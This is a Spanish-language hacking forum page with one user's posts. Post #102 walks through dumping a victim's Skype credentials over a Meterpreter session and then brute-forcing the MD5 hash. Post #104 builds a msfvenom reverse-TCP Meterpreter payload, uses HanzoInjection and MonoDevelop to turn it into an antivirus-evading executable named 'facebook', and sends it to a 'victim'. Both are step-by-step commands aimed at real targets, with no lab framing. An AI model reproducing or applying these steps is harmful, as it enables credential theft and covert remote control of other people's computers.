Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BrowserNet

#101
Hola, gabriela un gusto recibir su amable respuesta, es lo que me pregunto : / , como ves estoy utilizando el navegador por defecto de Kali, el Iceweasel, eh borrado mi cookie y entrado de nuevo, pero de igual manera me sale el error.

POSDATA: los POST'S, que cuelgo son cortos sobre "Msfconsole", el que quiero subir es otro 4 veces mas largos sobre la combinaciones entre un ataque de Ingeniería social, metasploit,  SET & etc, , Gracias por su respuesta  : ( 
#102
Dump skype account our victim for Metasploit



Saludos hermanos nuevamente siguiendo con el pequeño maratón de los complementos de Metasploit Framework jajaja, lo que haremos ahora sera Dumpear los datos de las cuentas almacenadas de nuestras victimas.



Como ustedes ya saben, necesitamos una Session Meterpreter para conectarnos con nuestra victima y enviar el Exploit remotamente, dejare los siguientes POST donde enseño como hacerlo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una ves explotado el sistema de nuestra victima, como vemos en la siguiente imagen:



Añadiremos "Background" para salir de session meterpreter y añadiremos lo siguiente:

Código: php
msf exploit(handler) > use post/windows/gather/credentials/skype
msf post(skype) > set SESSION 1
SESSION => 1
msf post(skype) > exploit

en la sintaxis set SESSION 1, añadí el numero 1 por el simple hecho que es la primera session de conexión que hemos recibido.

Si ustedes desean ver la lista de las sesiones lo pueden hacer  añadiendo el comando sessions -i , pero antes deben salir de la session meterpreter mediante background.
Una ves hecho  todo lo siguiente, le daremos Exploit.



Como vemos nos Dumpeo la cuenta de Skype registrada de nuestra victima:

El USER de la cuenta la oculte por privacidad, pero la contraseña NO, porque vemos que esta en HASH md5.

Ejemplo:

pepito:018347a360343c4d1b88d8e4dfab756a



Dado lo siguiente, usted puede hacer un ataque de fuerza bruta para obtener la contraseña, Saludos hermanos.
#103


Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator at root@localhost to inform them of the time this error occurred, and the actions you performed just before this error.

More information about this error may be available in the server error log.

Buenas noches hermano de Underc0de Por favor, si es por el limite de caracteres lo pueden ampliar, desde ayer estoy intentando subir el POST, pero me bloquea el servidor, Alguien que pueda elaborar el favor de aumentar la cantidad de caracteres ¿?
#104
Buenas tardes soy nuevo en el foro mi seudonimo es Browsernet, tengo un blog algo conocido, creo que muchos de esta comunidad lo han visto.
Estare colgado contenido de mi autoria cada dia.

¿me preguntaran porque me uni a underc0de?

Yo humildemente respondere porque aqui "Estan los mejores"
#Saludos para todos,




Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin



ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:





Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# wine HanzoInjection.exe



Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs



root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# leafpad meterpreter.cs



Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~#monodevelop



Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.



Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs



Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml



Nos iremos a la pestaña "Referencias" > Editar



Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"



Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:




Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)





lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080.



Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente.



Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:



Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.



Gracias por visitar este POST.